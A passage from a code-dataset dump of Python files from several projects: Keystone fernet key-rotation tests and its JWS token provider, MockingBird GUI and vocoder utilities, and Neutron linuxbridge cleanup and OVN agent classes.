'fernet_receipts',
CONF.fernet_receipts.max_active_keys
)
)
# Validate the initial repository state.
self.assertRepositoryState(expected_size=min_active_keys)
# The repository should be initialized with a staged key (0) and a
# primary key (1). The next key is just auto-incremented.
exp_keys = [0, 1]
next_key_number = exp_keys[-1] + 1 # keep track of next key
self.assertEqual(exp_keys, self.keys)
# Rotate the keys just enough times to fully populate the key
# repository.
key_utils = fernet_utils.FernetUtils(
CONF.fernet_receipts.key_repository,
CONF.fernet_receipts.max_active_keys,
'fernet_receipts'
)
for rotation in range(max_active_keys - min_active_keys):
key_utils.rotate_keys()
self.assertRepositoryState(expected_size=rotation + 3)
exp_keys.append(next_key_number)
next_key_number += 1
self.assertEqual(exp_keys, self.keys)
# We should have a fully populated key repository now.
self.assertEqual(max_active_keys, self.key_repository_size)
# Rotate an additional number of times to ensure that we maintain
# the desired number of active keys.
key_utils = fernet_utils.FernetUtils(
CONF.fernet_receipts.key_repository,
CONF.fernet_receipts.max_active_keys,
'fernet_receipts'
)
for rotation in range(10):
key_utils.rotate_keys()
self.assertRepositoryState(expected_size=max_active_keys)
exp_keys.pop(1)
exp_keys.append(next_key_number)
next_key_number += 1
self.assertEqual(exp_keys, self.keys)
def test_rotation_disk_write_fail(self):
# Make sure that the init key repository contains 2 keys
self.assertRepositoryState(expected_size=2)
key_utils = fernet_utils.FernetUtils(
CONF.fernet_receipts.key_repository,
CONF.fernet_receipts.max_active_keys,
'fernet_receipts'
)
# Simulate the disk full situation
mock_open = mock.mock_open()
file_handle = mock_open()
file_handle.flush.side_effect = IOError('disk full')
with mock.patch('keystone.common.fernet_utils.open', mock_open):
self.assertRaises(IOError, key_utils.rotate_keys)
# Assert that the key repository is unchanged
self.assertEqual(self.key_repository_size, 2)
with mock.patch('keystone.common.fernet_utils.open', mock_open):
self.assertRaises(IOError, key_utils.rotate_keys)
# Assert that the key repository is still unchanged, even after
# repeated rotation attempts.
self.assertEqual(self.key_repository_size, 2)
# Rotate the keys normally, without any mocking, to show that the
# system can recover.
key_utils.rotate_keys()
# Assert that the key repository is now expanded.
self.assertEqual(self.key_repository_size, 3)
def test_rotation_empty_file(self):
active_keys = 2
self.assertRepositoryState(expected_size=active_keys)
empty_file = os.path.join(CONF.fernet_receipts.key_repository, '2')
with open(empty_file, 'w'):
pass
key_utils = fernet_utils.FernetUtils(
CONF.fernet_receipts.key_repository,
CONF.fernet_receipts.max_active_keys,
'fernet_receipts'
)
# Rotate the keys to overwrite the empty file
key_utils.rotate_keys()
self.assertTrue(os.path.isfile(empty_file))
keys = key_utils.load_keys()
self.assertEqual(3, len(keys))
self.assertTrue(os.path.getsize(empty_file) > 0)
def test_non_numeric_files(self):
evil_file = os.path.join(CONF.fernet_receipts.key_repository, '99.bak')
with open(evil_file, 'w'):
pass
key_utils = fernet_utils.FernetUtils(
CONF.fernet_receipts.key_repository,
CONF.fernet_receipts.max_active_keys,
'fernet_receipts'
)
key_utils.rotate_keys()
self.assertTrue(os.path.isfile(evil_file))
keys = 0
for x in os.listdir(CONF.fernet_receipts.key_repository):
if x == '99.bak':
continue
keys += 1
self.assertEqual(3, keys)
class TestLoadKeys(unit.TestCase):
def assertValidFernetKeys(self, keys):
# Make sure each key is a non-empty string
for key in keys:
self.assertGreater(len(key), 0)
self.assertIsInstance(key, str)
def test_non_numeric_files(self):
evil_file = os.path.join(CONF.fernet_receipts.key_repository, '~1')
with open(evil_file, 'w'):
pass
key_utils = fernet_utils.FernetUtils(
CONF.fernet_receipts.key_repository,
CONF.fernet_receipts.max_active_keys,
'fernet_receipts'
)
keys = key_utils.load_keys()
self.assertEqual(2, len(keys))
self.assertValidFernetKeys(keys)
def test_empty_files(self):
empty_file = os.path.join(CONF.fernet_receipts.key_repository, '2')
with open(empty_file, 'w'):
pass
key_utils = fernet_utils.FernetUtils(
CONF.fernet_receipts.key_repository,
CONF.fernet_receipts.max_active_keys,
'fernet_receipts'
)
keys = key_utils.load_keys()
self.assertEqual(2, len(keys))
self.assertValidFernetKeys(keys)
```
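The `key_repository_signature` property above fingerprints the repository by hashing key contents and ignoring filenames, so a pure rename (as happens during rotation) does not change the signature. A standalone sketch of the same idea, independent of the keystone fixtures:

```python
import hashlib
import os

def repository_signature(key_dir):
    """Hash the contents of every key file, ignoring filenames."""
    contents = []
    for name in os.listdir(key_dir):
        with open(os.path.join(key_dir, name)) as f:
            contents.append(f.read())
    signature = hashlib.sha1()
    for key in sorted(contents):  # order by content, not by filename
        signature.update(key.encode('utf-8'))
    return signature.hexdigest()
```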
#### File: providers/jws/core.py
```python
import datetime
import os
import jwt
from oslo_utils import timeutils
from keystone.common import utils
import keystone.conf
from keystone import exception
from keystone.i18n import _
from keystone.token.providers import base
CONF = keystone.conf.CONF
class Provider(base.Provider):
def __init__(self, *args, **kwargs):
super(Provider, self).__init__(*args, **kwargs)
# NOTE(lbragstad): We add these checks here because if the jws
# provider is going to be used and either the `key_repository` is empty
# or doesn't exist we should fail, hard. It doesn't make sense to start
# keystone and just 500 because we can't do anything with an empty or
        # non-existent key repository.
private_key = os.path.join(
CONF.jwt_tokens.jws_private_key_repository, 'private.pem'
)
public_key_repo = CONF.jwt_tokens.jws_public_key_repository
if not os.path.exists(private_key):
subs = {'private_key': private_key}
raise SystemExit(_(
'%(private_key)s does not exist. You can generate a key pair '
'using `keystone-manage create_jws_keypair`.') % subs)
if not os.path.exists(public_key_repo):
subs = {'public_key_repo': public_key_repo}
raise SystemExit(_(
'%(public_key_repo)s does not exist. Please make sure the '
'directory exists and is readable by the process running '
'keystone.') % subs)
if len(os.listdir(public_key_repo)) == 0:
subs = {'public_key_repo': public_key_repo}
msg = _(
'%(public_key_repo)s must contain at least one public '
'key but it is empty. You can generate a key pair using '
'`keystone-manage create_jws_keypair`.'
)
raise SystemExit(msg % subs)
self.token_formatter = JWSFormatter()
def generate_id_and_issued_at(self, token):
return self.token_formatter.create_token(
token.user_id, token.expires_at, token.audit_ids, token.methods,
system=token.system, domain_id=token.domain_id,
project_id=token.project_id, trust_id=token.trust_id,
federated_group_ids=token.federated_groups,
identity_provider_id=token.identity_provider_id,
protocol_id=token.protocol_id,
access_token_id=token.access_token_id,
app_cred_id=token.application_credential_id
)
def validate_token(self, token_id):
return self.token_formatter.validate_token(token_id)
class JWSFormatter(object):
# NOTE(lbragstad): If in the future we expand support for different
# algorithms, make this configurable and validate it against a blessed list
# of supported algorithms.
algorithm = 'ES256'
@property
def private_key(self):
private_key_path = os.path.join(
CONF.jwt_tokens.jws_private_key_repository, 'private.pem'
)
with open(private_key_path, 'r') as f:
key = f.read()
return key
@property
def public_keys(self):
keys = []
key_repo = CONF.jwt_tokens.jws_public_key_repository
for keyfile in os.listdir(key_repo):
with open(os.path.join(key_repo, keyfile), 'r') as f:
keys.append(f.read())
return keys
def create_token(self, user_id, expires_at, audit_ids, methods,
system=None, domain_id=None, project_id=None,
trust_id=None, federated_group_ids=None,
identity_provider_id=None, protocol_id=None,
access_token_id=None, app_cred_id=None):
issued_at = utils.isotime(subsecond=True)
issued_at_int = self._convert_time_string_to_int(issued_at)
expires_at_int = self._convert_time_string_to_int(expires_at)
payload = {
# public claims
'sub': user_id,
'iat': issued_at_int,
'exp': expires_at_int,
# private claims
'openstack_methods': methods,
'openstack_audit_ids': audit_ids,
'openstack_system': system,
'openstack_domain_id': domain_id,
'openstack_project_id': project_id,
'openstack_trust_id': trust_id,
'openstack_group_ids': federated_group_ids,
'openstack_idp_id': identity_provider_id,
'openstack_protocol_id': protocol_id,
'openstack_access_token_id': access_token_id,
'openstack_app_cred_id': app_cred_id
}
# NOTE(lbragstad): Calling .items() on a dictionary in python 2 returns
# a list but returns an iterable in python 3. Casting to a list makes
# it safe to modify the dictionary while iterating over it, regardless
# of the python version.
for k, v in list(payload.items()):
if v is None:
payload.pop(k)
token_id = jwt.encode(
payload,
self.private_key,
algorithm=JWSFormatter.algorithm
)
return token_id, issued_at
def validate_token(self, token_id):
payload = self._decode_token_from_id(token_id)
user_id = payload['sub']
expires_at_int = payload['exp']
issued_at_int = payload['iat']
methods = payload['openstack_methods']
audit_ids = payload['openstack_audit_ids']
system = payload.get('openstack_system', None)
domain_id = payload.get('openstack_domain_id', None)
project_id = payload.get('openstack_project_id', None)
trust_id = payload.get('openstack_trust_id', None)
federated_group_ids = payload.get('openstack_group_ids', None)
identity_provider_id = payload.get('openstack_idp_id', None)
protocol_id = payload.get('openstack_protocol_id', None)
access_token_id = payload.get('openstack_access_token_id', None)
app_cred_id = payload.get('openstack_app_cred_id', None)
issued_at = self._convert_time_int_to_string(issued_at_int)
expires_at = self._convert_time_int_to_string(expires_at_int)
return (
user_id, methods, audit_ids, system, domain_id, project_id,
trust_id, federated_group_ids, identity_provider_id, protocol_id,
access_token_id, app_cred_id, issued_at, expires_at
)
def _decode_token_from_id(self, token_id):
options = dict()
options['verify_exp'] = False
for public_key in self.public_keys:
try:
return jwt.decode(
token_id, public_key, algorithms=JWSFormatter.algorithm,
options=options
)
except (jwt.InvalidSignatureError, jwt.DecodeError):
pass # nosec: We want to exhaustively try all public keys
raise exception.TokenNotFound(token_id=token_id)
def _convert_time_string_to_int(self, time_str):
time_object = timeutils.parse_isotime(time_str)
normalized = timeutils.normalize_time(time_object)
epoch = datetime.datetime.utcfromtimestamp(0)
return int((normalized - epoch).total_seconds())
def _convert_time_int_to_string(self, time_int):
time_object = datetime.datetime.utcfromtimestamp(time_int)
return utils.isotime(at=time_object, subsecond=True)
``` |
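A minimal sketch of the encode/decode round trip the provider performs, using PyJWT directly. It assumes `private_pem`/`public_pem` hold an EC P-256 key pair, e.g. one generated with `keystone-manage create_jws_keypair`.

```python
import jwt

def roundtrip(private_pem, public_pem):
    payload = {'sub': 'some-user-id', 'iat': 1700000000, 'exp': 1700003600}
    token = jwt.encode(payload, private_pem, algorithm='ES256')
    # verify_exp is disabled here to mirror _decode_token_from_id above,
    # which leaves expiry checking to the caller.
    return jwt.decode(token, public_pem, algorithms=['ES256'],
                      options={'verify_exp': False})
```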
{
"source": "10088/MockingBird",
"score": 2
} |
#### File: base/api/fastapi_utils.py
```python
import inspect
from typing import Any, Type
from fastapi import FastAPI, Form
from pydantic import BaseModel
def as_form(cls: Type[BaseModel]) -> Any:
"""Adds an as_form class method to decorated models.
The as_form class method can be used with FastAPI endpoints
"""
new_params = [
inspect.Parameter(
field.alias,
inspect.Parameter.POSITIONAL_ONLY,
default=(Form(field.default) if not field.required else Form(...)),
)
for field in cls.__fields__.values()
]
async def _as_form(**data): # type: ignore
return cls(**data)
sig = inspect.signature(_as_form)
sig = sig.replace(parameters=new_params)
_as_form.__signature__ = sig # type: ignore
setattr(cls, "as_form", _as_form)
return cls
def patch_fastapi(app: FastAPI) -> None:
"""Patch function to allow relative url resolution.
This patch is required to make fastapi fully functional with a relative url path.
This code snippet can be copy-pasted to any Fastapi application.
"""
from fastapi.openapi.docs import get_redoc_html, get_swagger_ui_html
from starlette.requests import Request
from starlette.responses import HTMLResponse
async def redoc_ui_html(req: Request) -> HTMLResponse:
assert app.openapi_url is not None
redoc_ui = get_redoc_html(
openapi_url="./" + app.openapi_url.lstrip("/"),
title=app.title + " - Redoc UI",
)
return HTMLResponse(redoc_ui.body.decode("utf-8"))
async def swagger_ui_html(req: Request) -> HTMLResponse:
assert app.openapi_url is not None
swagger_ui = get_swagger_ui_html(
openapi_url="./" + app.openapi_url.lstrip("/"),
title=app.title + " - Swagger UI",
oauth2_redirect_url=app.swagger_ui_oauth2_redirect_url,
)
        # insert request interceptor to have all requests run on a relative path
request_interceptor = (
"requestInterceptor: (e) => {"
"\n\t\t\tvar url = window.location.origin + window.location.pathname"
'\n\t\t\turl = url.substring( 0, url.lastIndexOf( "/" ) + 1);'
"\n\t\t\turl = e.url.replace(/http(s)?:\/\/[^/]*\//i, url);" # noqa: W605
"\n\t\t\te.contextUrl = url"
"\n\t\t\te.url = url"
"\n\t\t\treturn e;}"
)
return HTMLResponse(
swagger_ui.body.decode("utf-8").replace(
"dom_id: '#swagger-ui',",
"dom_id: '#swagger-ui',\n\t\t" + request_interceptor + ",",
)
)
# remove old docs route and add our patched route
routes_new = []
for app_route in app.routes:
if app_route.path == "/docs": # type: ignore
continue
if app_route.path == "/redoc": # type: ignore
continue
routes_new.append(app_route)
app.router.routes = routes_new
assert app.docs_url is not None
app.add_route(app.docs_url, swagger_ui_html, include_in_schema=False)
assert app.redoc_url is not None
app.add_route(app.redoc_url, redoc_ui_html, include_in_schema=False)
    # Make graphql relative
from starlette import graphql
graphql.GRAPHIQL = graphql.GRAPHIQL.replace(
"({{REQUEST_PATH}}", '("." + {{REQUEST_PATH}}'
)
```
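A hypothetical usage sketch for the `as_form` decorator defined above (the endpoint and model are illustrative, and `as_form` is assumed to be imported from this module):

```python
from fastapi import Depends, FastAPI
from pydantic import BaseModel

app = FastAPI()

@as_form
class LoginForm(BaseModel):
    username: str
    remember_me: bool = False

@app.post("/login")
async def login(form: LoginForm = Depends(LoginForm.as_form)):
    # FastAPI populates the model from form fields instead of a JSON body.
    return {"user": form.username, "remember": form.remember_me}
```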
#### File: mkgui/base/core.py
```python
import importlib
import inspect
import re
from typing import Any, Callable, Type, Union, get_type_hints
from pydantic import BaseModel, parse_raw_as
from pydantic.tools import parse_obj_as
def name_to_title(name: str) -> str:
"""Converts a camelCase or snake_case name to title case."""
# If camelCase -> convert to snake case
name = re.sub("(.)([A-Z][a-z]+)", r"\1_\2", name)
name = re.sub("([a-z0-9])([A-Z])", r"\1_\2", name).lower()
# Convert to title case
return name.replace("_", " ").strip().title()
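# Illustrative examples (not part of the original module):
#   name_to_title("myCamelCaseName")  -> "My Camel Case Name"
#   name_to_title("snake_case_name")  -> "Snake Case Name"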
def is_compatible_type(type: Type) -> bool:
"""Returns `True` if the type is opyrator-compatible."""
try:
if issubclass(type, BaseModel):
return True
except Exception:
pass
try:
# valid list type
if type.__origin__ is list and issubclass(type.__args__[0], BaseModel):
return True
except Exception:
pass
return False
def get_input_type(func: Callable) -> Type:
"""Returns the input type of a given function (callable).
Args:
func: The function for which to get the input type.
Raises:
ValueError: If the function does not have a valid input type annotation.
"""
type_hints = get_type_hints(func)
if "input" not in type_hints:
raise ValueError(
"The callable MUST have a parameter with the name `input` with typing annotation. "
"For example: `def my_opyrator(input: InputModel) -> OutputModel:`."
)
input_type = type_hints["input"]
if not is_compatible_type(input_type):
raise ValueError(
"The `input` parameter MUST be a subclass of the Pydantic BaseModel or a list of Pydantic models."
)
# TODO: return warning if more than one input parameters
return input_type
def get_output_type(func: Callable) -> Type:
"""Returns the output type of a given function (callable).
Args:
func: The function for which to get the output type.
Raises:
ValueError: If the function does not have a valid output type annotation.
"""
type_hints = get_type_hints(func)
if "return" not in type_hints:
raise ValueError(
"The return type of the callable MUST be annotated with type hints."
"For example: `def my_opyrator(input: InputModel) -> OutputModel:`."
)
output_type = type_hints["return"]
if not is_compatible_type(output_type):
raise ValueError(
"The return value MUST be a subclass of the Pydantic BaseModel or a list of Pydantic models."
)
return output_type
def get_callable(import_string: str) -> Callable:
"""Import a callable from an string."""
callable_seperator = ":"
if callable_seperator not in import_string:
# Use dot as seperator
callable_seperator = "."
if callable_seperator not in import_string:
raise ValueError("The callable path MUST specify the function. ")
mod_name, callable_name = import_string.rsplit(callable_seperator, 1)
mod = importlib.import_module(mod_name)
return getattr(mod, callable_name)
class Opyrator:
def __init__(self, func: Union[Callable, str]) -> None:
if isinstance(func, str):
            # Try to load the function from a string notation
self.function = get_callable(func)
else:
self.function = func
self._action = "Execute"
self._input_type = None
self._output_type = None
if not callable(self.function):
raise ValueError("The provided function parameters is not a callable.")
if inspect.isclass(self.function):
raise ValueError(
"The provided callable is an uninitialized Class. This is not allowed."
)
if inspect.isfunction(self.function):
# The provided callable is a function
self._input_type = get_input_type(self.function)
self._output_type = get_output_type(self.function)
try:
# Get name
self._name = name_to_title(self.function.__name__)
except Exception:
pass
try:
# Get description from function
doc_string = inspect.getdoc(self.function)
if doc_string:
self._action = doc_string
except Exception:
pass
elif hasattr(self.function, "__call__"):
            # The provided callable is a callable object (a class instance with __call__)
self._input_type = get_input_type(self.function.__call__) # type: ignore
self._output_type = get_output_type(self.function.__call__) # type: ignore
try:
# Get name
self._name = name_to_title(type(self.function).__name__)
except Exception:
pass
try:
                # Get action from the __call__ docstring
doc_string = inspect.getdoc(self.function.__call__) # type: ignore
if doc_string:
self._action = doc_string
if (
not self._action
or self._action == "Call"
):
# Get docstring from class instead of __call__ function
doc_string = inspect.getdoc(self.function)
if doc_string:
self._action = doc_string
except Exception:
pass
else:
raise ValueError("Unknown callable type.")
@property
def name(self) -> str:
return self._name
@property
def action(self) -> str:
return self._action
@property
def input_type(self) -> Any:
return self._input_type
@property
def output_type(self) -> Any:
return self._output_type
def __call__(self, input: Any, **kwargs: Any) -> Any:
input_obj = input
if isinstance(input, str):
# Allow json input
input_obj = parse_raw_as(self.input_type, input)
if isinstance(input, dict):
# Allow dict input
input_obj = parse_obj_as(self.input_type, input)
return self.function(input_obj, **kwargs)
```
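A minimal sketch of wrapping a plain function with `Opyrator` (the models and function are illustrative):

```python
from pydantic import BaseModel

class GreetInput(BaseModel):
    name: str

class GreetOutput(BaseModel):
    message: str

def greet(input: GreetInput) -> GreetOutput:
    """Build a greeting for the given name."""
    return GreetOutput(message=f"Hello, {input.name}!")

op = Opyrator(greet)
print(op.name)                  # "Greet"
print(op.action)                # "Build a greeting for the given name."
result = op('{"name": "Ada"}')  # JSON string input is parsed automatically
print(result.message)           # "Hello, Ada!"
```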
#### File: MockingBird/mkgui/preprocess.py
```python
from pydantic import BaseModel, Field
import os
from pathlib import Path
from enum import Enum
from typing import Any
# Constants
EXT_MODELS_DIRT = "ppg_extractor\\saved_models"
ENC_MODELS_DIRT = "encoder\\saved_models"
if os.path.isdir(EXT_MODELS_DIRT):
extractors = Enum('extractors', list((file.name, file) for file in Path(EXT_MODELS_DIRT).glob("**/*.pt")))
print("Loaded extractor models: " + str(len(extractors)))
else:
raise Exception(f"Model folder {EXT_MODELS_DIRT} doesn't exist.")
if os.path.isdir(ENC_MODELS_DIRT):
encoders = Enum('encoders', list((file.name, file) for file in Path(ENC_MODELS_DIRT).glob("**/*.pt")))
print("Loaded encoders models: " + str(len(encoders)))
else:
raise Exception(f"Model folder {ENC_MODELS_DIRT} doesn't exist.")
class Model(str, Enum):
VC_PPG2MEL = "ppg2mel"
class Dataset(str, Enum):
AIDATATANG_200ZH = "aidatatang_200zh"
AIDATATANG_200ZH_S = "aidatatang_200zh_s"
class Input(BaseModel):
# def render_input_ui(st, input) -> Dict:
# input["selected_dataset"] = st.selectbox(
    #         'Select dataset',
# ("aidatatang_200zh", "aidatatang_200zh_s")
# )
# return input
model: Model = Field(
Model.VC_PPG2MEL, title="目标模型",
)
dataset: Dataset = Field(
Dataset.AIDATATANG_200ZH, title="数据集选择",
)
datasets_root: str = Field(
..., alias="数据集根目录", description="输入数据集根目录(相对/绝对)",
format=True,
example="..\\trainning_data\\"
)
output_root: str = Field(
..., alias="输出根目录", description="输出结果根目录(相对/绝对)",
format=True,
example="..\\trainning_data\\"
)
n_processes: int = Field(
2, alias="处理线程数", description="根据CPU线程数来设置",
le=32, ge=1
)
extractor: extractors = Field(
..., alias="特征提取模型",
description="选择PPG特征提取模型文件."
)
encoder: encoders = Field(
..., alias="语音编码模型",
description="选择语音编码模型文件."
)
class AudioEntity(BaseModel):
content: bytes
mel: Any
class Output(BaseModel):
__root__: tuple[str, int]
def render_output_ui(self, streamlit_app, input) -> None: # type: ignore
"""Custom output UI.
        If this method is implemented, it will be used instead of the default Output UI renderer.
"""
        dataset, count = self.__root__
        streamlit_app.subheader(f"Dataset {dataset} preprocessing done: {count} items processed")
def preprocess(input: Input) -> Output:
"""Preprocess(预处理)"""
finished = 0
if input.model == Model.VC_PPG2MEL:
from ppg2mel.preprocess import preprocess_dataset
finished = preprocess_dataset(
datasets_root=Path(input.datasets_root),
dataset=input.dataset,
out_dir=Path(input.output_root),
n_processes=input.n_processes,
ppg_encoder_model_fpath=Path(input.extractor.value),
speaker_encoder_model=Path(input.encoder.value)
)
# TODO: pass useful return code
return Output(__root__=(input.dataset, finished))
```
#### File: vocoder/fregan/dwt.py
```python
import pywt
import torch
import torch.nn as nn
import torch.nn.functional as F
__all__ = ['DWT_1D']
Pad_Mode = ['constant', 'reflect', 'replicate', 'circular']
class DWT_1D(nn.Module):
def __init__(self, pad_type='reflect', wavename='haar',
stride=2, in_channels=1, out_channels=None, groups=None,
kernel_size=None, trainable=False):
super(DWT_1D, self).__init__()
self.trainable = trainable
self.kernel_size = kernel_size
if not self.trainable:
            assert self.kernel_size is None
        self.in_channels = in_channels
        self.out_channels = self.in_channels if out_channels is None else out_channels
        self.groups = self.in_channels if groups is None else groups
assert isinstance(self.groups, int) and self.in_channels % self.groups == 0
self.stride = stride
assert self.stride == 2
self.wavename = wavename
self.pad_type = pad_type
assert self.pad_type in Pad_Mode
self.get_filters()
self.initialization()
def get_filters(self):
wavelet = pywt.Wavelet(self.wavename)
band_low = torch.tensor(wavelet.rec_lo)
band_high = torch.tensor(wavelet.rec_hi)
length_band = band_low.size()[0]
        self.kernel_size = length_band if self.kernel_size is None else self.kernel_size
assert self.kernel_size >= length_band
a = (self.kernel_size - length_band) // 2
b = - (self.kernel_size - length_band - a)
b = None if b == 0 else b
self.filt_low = torch.zeros(self.kernel_size)
self.filt_high = torch.zeros(self.kernel_size)
self.filt_low[a:b] = band_low
self.filt_high[a:b] = band_high
def initialization(self):
self.filter_low = self.filt_low[None, None, :].repeat((self.out_channels, self.in_channels // self.groups, 1))
self.filter_high = self.filt_high[None, None, :].repeat((self.out_channels, self.in_channels // self.groups, 1))
if torch.cuda.is_available():
self.filter_low = self.filter_low.cuda()
self.filter_high = self.filter_high.cuda()
if self.trainable:
self.filter_low = nn.Parameter(self.filter_low)
self.filter_high = nn.Parameter(self.filter_high)
if self.kernel_size % 2 == 0:
self.pad_sizes = [self.kernel_size // 2 - 1, self.kernel_size // 2 - 1]
else:
self.pad_sizes = [self.kernel_size // 2, self.kernel_size // 2]
def forward(self, input):
assert isinstance(input, torch.Tensor)
assert len(input.size()) == 3
assert input.size()[1] == self.in_channels
input = F.pad(input, pad=self.pad_sizes, mode=self.pad_type)
return F.conv1d(input, self.filter_low.to(input.device), stride=self.stride, groups=self.groups), \
F.conv1d(input, self.filter_high.to(input.device), stride=self.stride, groups=self.groups)
```
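A quick shape check for the stride-2 decomposition implemented above (illustrative usage, assuming `DWT_1D` is importable from this module):

```python
import torch

# One-channel batch of length-16 signals; Haar wavelet, stride 2.
dwt = DWT_1D(in_channels=1, wavename='haar')
x = torch.randn(4, 1, 16)
low, high = dwt(x)
# Each branch halves the temporal dimension: (4, 1, 16) -> (4, 1, 8).
print(low.shape, high.shape)
```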
#### File: vocoder/hifigan/env.py
```python
import os
import shutil
def build_env(config, config_name, path):
t_path = os.path.join(path, config_name)
if config != t_path:
os.makedirs(path, exist_ok=True)
shutil.copyfile(config, os.path.join(path, config_name))
```
#### File: 10088/MockingBird/web.py
```python
import os
import sys
import typer
cli = typer.Typer()
@cli.command()
def launch_ui(port: int = typer.Option(8080, "--port", "-p")) -> None:
"""Start a graphical UI server for the opyrator.
    The UI is auto-generated from the input and output schemas of the given function.
"""
# Add the current working directory to the sys path
# This is required to resolve the opyrator path
sys.path.append(os.getcwd())
from mkgui.base.ui.streamlit_ui import launch_ui
launch_ui(port)
if __name__ == "__main__":
cli()
``` |
{
"source": "10088/neutron",
"score": 2
} |
#### File: neutron/cmd/linuxbridge_cleanup.py
```python
import sys
from neutron_lib.utils import helpers
from oslo_config import cfg
from oslo_log import log as logging
from neutron.common import config as common_config
from neutron.conf.agent import common as config
from neutron.plugins.ml2.drivers.linuxbridge.agent \
import linuxbridge_neutron_agent
LOG = logging.getLogger(__name__)
def remove_empty_bridges():
try:
interface_mappings = helpers.parse_mappings(
cfg.CONF.LINUX_BRIDGE.physical_interface_mappings)
except ValueError as e:
LOG.error("Parsing physical_interface_mappings failed: %s.", e)
sys.exit(1)
LOG.info("Interface mappings: %s.", interface_mappings)
try:
bridge_mappings = helpers.parse_mappings(
cfg.CONF.LINUX_BRIDGE.bridge_mappings)
except ValueError as e:
LOG.error("Parsing bridge_mappings failed: %s.", e)
sys.exit(1)
LOG.info("Bridge mappings: %s.", bridge_mappings)
lb_manager = linuxbridge_neutron_agent.LinuxBridgeManager(
bridge_mappings, interface_mappings)
bridge_names = lb_manager.get_deletable_bridges()
for bridge_name in bridge_names:
if lb_manager.get_tap_devices_count(bridge_name):
continue
try:
lb_manager.delete_bridge(bridge_name)
LOG.info("Linux bridge %s deleted", bridge_name)
except RuntimeError:
LOG.exception("Linux bridge %s delete failed", bridge_name)
LOG.info("Linux bridge cleanup completed successfully")
def main():
"""Main method for cleaning up empty linux bridges.
    This tool deletes every empty linux bridge managed by the linuxbridge
    agent (brq.* linux bridges), except the ones defined using the
    bridge_mappings option in section LINUX_BRIDGE (created by deployers).
This tool should not be called during an instance create, migrate, etc. as
it can delete a linux bridge about to be used by nova.
"""
common_config.register_common_config_options()
cfg.CONF(sys.argv[1:])
config.setup_logging()
config.setup_privsep()
remove_empty_bridges()
```
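For context, `helpers.parse_mappings` (from neutron_lib) turns the list of `key:value` strings behind both config options into a dict; a small sketch with illustrative values:
```python
from neutron_lib.utils import helpers

# Values here are made up; the real list comes from the agent config file.
mappings = helpers.parse_mappings(['physnet1:eth1', 'physnet2:eth2'])
assert mappings == {'physnet1': 'eth1', 'physnet2': 'eth2'}
# A malformed entry (e.g. a missing ':') raises ValueError, which is why
# remove_empty_bridges() wraps both parses and exits with status 1.
```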
#### File: ovn/agent/neutron_agent.py
```python
import abc
import copy
import datetime
from oslo_config import cfg
from oslo_utils import timeutils
from neutron._i18n import _
from neutron.common.ovn import constants as ovn_const
from neutron.common.ovn import utils as ovn_utils
from neutron.common import utils
class DeletedChassis(object):
external_ids = {}
hostname = '("Chassis" register deleted)'
name = '("Chassis" register deleted)'
class NeutronAgent(abc.ABC):
types = {}
def __init_subclass__(cls):
# Register the subclasses to be looked up by their type
NeutronAgent.types[cls.agent_type] = cls
def __init__(self, chassis_private, driver, updated_at=None):
self.driver = driver
self.set_down = False
self.update(chassis_private, updated_at)
def update(self, chassis_private, updated_at=None, clear_down=False):
self.chassis_private = chassis_private
if not updated_at:
            # When the Chassis_Private table is used for the agent health
            # check, chassis_private has the attribute nb_cfg_timestamp.
            # nb_cfg_timestamp is the timestamp at which ovn-controller
            # finished processing the change corresponding to nb_cfg (see
            # https://www.ovn.org/support/dist-docs/ovn-sb.5.html), so it
            # reflects the chassis status more accurately. It is expressed
            # in milliseconds and needs converting to a datetime.
if hasattr(chassis_private, 'nb_cfg_timestamp'):
updated_at = datetime.datetime.fromtimestamp(
chassis_private.nb_cfg_timestamp / 1000,
datetime.timezone.utc)
else:
updated_at = timeutils.utcnow(with_timezone=True)
self.updated_at = updated_at
if clear_down:
self.set_down = False
@staticmethod
def chassis_from_private(chassis_private):
try:
return chassis_private.chassis[0]
except AttributeError:
# No Chassis_Private support, just use Chassis
return chassis_private
except IndexError:
# Chassis register has been deleted but not Chassis_Private.
return DeletedChassis
@property
def chassis(self):
return self.chassis_from_private(self.chassis_private)
def as_dict(self):
return {
'binary': self.binary,
'host': self.chassis.hostname,
'heartbeat_timestamp': timeutils.utcnow(),
'availability_zone': ', '.join(
ovn_utils.get_chassis_availability_zones(self.chassis)),
'topic': 'n/a',
'description': self.description,
'configurations': {
'chassis_name': self.chassis.name,
'bridge-mappings':
self.chassis.external_ids.get('ovn-bridge-mappings', '')},
'start_flag': True,
'agent_type': self.agent_type,
'id': self.agent_id,
'alive': self.alive,
'admin_state_up': True}
@property
def alive(self):
if self.set_down:
return False
# TODO(twilson) Determine if we can go back to just checking:
# if self.driver.nb_ovn.nb_global.nb_cfg == self.nb_cfg:
if self.driver.nb_ovn.nb_global.nb_cfg - self.nb_cfg <= 1:
return True
now = timeutils.utcnow(with_timezone=True)
if (now - self.updated_at).total_seconds() < cfg.CONF.agent_down_time:
# down, but not yet timed out
return True
return False
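    # In short: unless explicitly set down, an agent is considered alive if
    # its nb_cfg lags the NB global nb_cfg by at most one, or if its last
    # update happened within the last CONF.agent_down_time seconds.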
@classmethod
def from_type(cls, _type, chassis_private, driver, updated_at=None):
return cls.types[_type](chassis_private, driver, updated_at)
@property
@abc.abstractmethod
def agent_type(self):
pass
@property
@abc.abstractmethod
def binary(self):
pass
@property
@abc.abstractmethod
def nb_cfg(self):
pass
@property
@abc.abstractmethod
def agent_id(self):
pass
class ControllerAgent(NeutronAgent):
agent_type = ovn_const.OVN_CONTROLLER_AGENT
binary = 'ovn-controller'
@staticmethod # it is by default, but this makes pep8 happy
def __new__(cls, chassis_private, driver, updated_at=None):
external_ids = cls.chassis_from_private(chassis_private).external_ids
if ('enable-chassis-as-gw' in
external_ids.get('ovn-cms-options', [])):
cls = ControllerGatewayAgent
return super().__new__(cls)
@staticmethod
def id_from_chassis_private(chassis_private):
return chassis_private.name
@property
def nb_cfg(self):
return self.chassis_private.nb_cfg
@property
def agent_id(self):
return self.id_from_chassis_private(self.chassis_private)
@property
def description(self):
return self.chassis_private.external_ids.get(
ovn_const.OVN_AGENT_DESC_KEY, '')
def update(self, chassis_private, updated_at=None, clear_down=False):
super().update(chassis_private, updated_at, clear_down)
external_ids = self.chassis_from_private(chassis_private).external_ids
if 'enable-chassis-as-gw' in external_ids.get('ovn-cms-options', []):
self.__class__ = ControllerGatewayAgent
class ControllerGatewayAgent(ControllerAgent):
agent_type = ovn_const.OVN_CONTROLLER_GW_AGENT
def update(self, chassis_private, updated_at=None, clear_down=False):
super().update(chassis_private, updated_at, clear_down)
